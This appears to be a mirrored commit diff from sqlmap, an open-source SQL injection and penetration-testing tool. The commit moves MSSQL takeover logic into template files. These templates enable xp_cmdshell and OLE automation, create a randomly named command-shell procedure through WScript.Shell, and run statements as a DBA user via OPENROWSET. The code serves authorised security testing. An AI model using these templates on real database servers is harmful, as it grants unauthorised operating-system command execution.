sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-01-24 08:14:24 +03:00
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of github.com:sqlmapproject/sqlmap

Browse Source
This commit is contained in:
Miroslav Stampar 2012-07-03 00:50:45 +02:00
commit 5af6ca58a0
10 changed files with 52 additions and 41 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
lib/core/agent.py
View File

@ -11,6 +11,7 @@ from xml.etree import ElementTree as ET
from lib.core.common import Backend
from lib.core.common import extractRegexResult
from lib.core.common import getSPQLSnippet
from lib.core.common import isDBMSVersionAtLeast
from lib.core.common import isTechniqueAvailable
from lib.core.common import randomInt
@ -27,6 +28,7 @@ from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import FROM_DUMMY_TABLE
from lib.core.settings import GENERIC_SQL_COMMENT
from lib.core.settings import PAYLOAD_DELIMITER
from lib.core.settings import SQL_STATEMENTS
from lib.core.unescaper import unescaper
class Agent:
@ -816,5 +818,20 @@ class Agent:
return re.sub("(%s.*?%s)" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), "%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER), inpStr) if inpStr else inpStr
def runAsDBMSUser(self, query):
if conf.dCred and "Ad Hoc Distributed Queries" not in query:
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
for sqlStatement in sqlStatements:
if query.lower().startswith(sqlStatement):
sqlType = sqlTitle
break
if sqlType and "SELECT" not in sqlType:
query = "SELECT %d;%s" % (randomInt(), query)
query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
return query
# SQL agent
agent = Agent()

23
lib/takeover/abstraction.py
View File

@ -16,7 +16,6 @@ from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapUnsupportedFeatureException
from lib.core.settings import SQL_STATEMENTS
from lib.core.shell import autoCompletion
from lib.request import inject
from lib.takeover.udf import UDF
@ -38,21 +37,6 @@ class Abstraction(Web, UDF, xp_cmdshell):
Web.__init__(self)
xp_cmdshell.__init__(self)
def runAsDBMSUser(self, query):
if conf.dCred:
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
for sqlStatement in sqlStatements:
if query.lower().startswith(sqlStatement):
sqlType = sqlTitle
break
if sqlType and "SELECT" not in sqlType:
query = "SELECT 1;%s" % query
query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
return query
def execCmd(self, cmd, silent=False):
if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
self.webBackdoorRunCmd(cmd)
@ -201,6 +185,13 @@ class Abstraction(Web, UDF, xp_cmdshell):
if mandatory and not self.isDba():
warnMsg = "the functionality requested might not work because "
warnMsg += "the session user is not a database administrator"
if not conf.dCred and Backend.getIdentifiedDbms() in ( DBMS.MSSQL, DBMS.PGSQL ):
warnMsg += ". You can try to provide --dbms-cred switch "
warnMsg += "to execute statements as a DBA user if you "
warnMsg += "were able to extract and crack a DBA "
warnMsg += "password by any mean"
logger.warn(warnMsg)
if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):

31
lib/takeover/xp_cmdshell.py
View File

@ -5,6 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.agent import agent
from lib.core.common import Backend
from lib.core.common import getSPQLSnippet
from lib.core.common import hashDBWrite
@ -40,26 +41,19 @@ class xp_cmdshell:
if Backend.isVersionWithin(("2005", "2008")):
logger.debug("activating sp_OACreate")
cmd += "EXEC master..sp_configure 'show advanced options', 1; "
cmd += "RECONFIGURE WITH OVERRIDE; "
cmd += "EXEC master..sp_configure 'ole automation procedures', 1; "
cmd += "RECONFIGURE WITH OVERRIDE; "
inject.goStacked(cmd)
cmd = getSPQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
inject.goStacked(agent.runAsDBMSUser(cmd))
self.__randStr = randomStr(lowercase=True)
self.__xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
self.xpCmdshellStr = "master..%s" % self.__xpCmdshellNew
cmd += "DECLARE @%s nvarchar(999); " % self.__randStr
cmd += "set @%s='" % self.__randStr
cmd += "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int "
cmd += "EXEC sp_OACreate ''WScript.Shell'', @ID OUT "
cmd += "EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 "
cmd += "EXEC sp_OADestroy @ID'; "
cmd += "EXEC master..sp_executesql @%s;" % self.__randStr
cmd = getSPQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self.__randStr, XP_CMDSHELL_NEW=self.__xpCmdshellNew)
if Backend.isVersionWithin(("2005", "2008")):
cmd += " RECONFIGURE WITH OVERRIDE;"
cmd += ";RECONFIGURE WITH OVERRIDE"
inject.goStacked(cmd)
inject.goStacked(agent.runAsDBMSUser(cmd))
def __xpCmdshellConfigure2005(self, mode):
debugMsg = "configuring xp_cmdshell using sp_configure "
@ -76,10 +70,9 @@ class xp_cmdshell:
logger.debug(debugMsg)
if mode == 1:
cmd = "EXEC master..sp_addextendedproc 'xp_cmdshell', "
cmd += "@dllname='xplog70.dll'"
cmd = getSPQLSnippet(DBMS.MSSQL, "enable_xp_cmdshell_2000", ENABLE=str(mode))
else:
cmd = "EXEC master..sp_dropextendedproc 'xp_cmdshell'"
cmd = getSPQLSnippet(DBMS.MSSQL, "disable_xp_cmdshell_2000", ENABLE=str(mode))
return cmd
@ -89,7 +82,7 @@ class xp_cmdshell:
else:
cmd = self.__xpCmdshellConfigure2000(mode)
inject.goStacked(cmd)
inject.goStacked(agent.runAsDBMSUser(cmd))
def __xpCmdshellCheck(self):
cmd = "ping -n %d 127.0.0.1" % (conf.timeSec * 2)
@ -154,7 +147,7 @@ class xp_cmdshell:
self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
return self.runAsDBMSUser(self.__forgedCmd)
return agent.runAsDBMSUser(self.__forgedCmd)
def xpCmdshellExecCmd(self, cmd, silent=False):
cmd = self.xpCmdshellForgeCmd(cmd)

4
procs/mssqlserver/activate_sp_oacreate.txt Normal file
View File

@ -0,0 +1,4 @@
EXEC master..sp_configure 'show advanced options',1;
RECONFIGURE WITH OVERRIDE;
EXEC master..sp_configure 'ole automation procedures',1;
RECONFIGURE WITH OVERRIDE

2
procs/mssqlserver/configure_openrowset.txt
View File

@ -3,4 +3,4 @@ RECONFIGURE WITH OVERRIDE;
EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE WITH OVERRIDE;
RECONFIGURE WITH OVERRIDE

8
procs/mssqlserver/configure_xp_cmdshell.txt
View File

@ -1,6 +1,6 @@
EXEC master..sp_configure 'show advanced options', 1;
EXEC master..sp_configure 'show advanced options',1;
RECONFIGURE WITH OVERRIDE;
EXEC master..sp_configure 'xp_cmdshell', %ENABLE%;
EXEC master..sp_configure 'xp_cmdshell',%ENABLE%;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options',0;
RECONFIGURE WITH OVERRIDE

3
procs/mssqlserver/create_new_xp_cmdshell.txt Normal file
View File

@ -0,0 +1,3 @@
DECLARE @%RANDSTR% nvarchar(999);
set @%RANDSTR%='CREATE PROCEDURE %XP_CMDSHELL_NEW%(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
EXEC master..sp_executesql @%RANDSTR%

1
procs/mssqlserver/disable_xp_cmdshell_2000.txt Normal file
View File

@ -0,0 +1 @@
EXEC master..sp_dropextendedproc 'xp_cmdshell'

1
procs/mssqlserver/enable_xp_cmdshell_2000.txt Normal file
View File

@ -0,0 +1 @@
EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll'

3
procs/mssqlserver/run_statement_as_user.txt
View File

@ -1 +1,2 @@
SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%');
SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%')
# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','%STATEMENT%')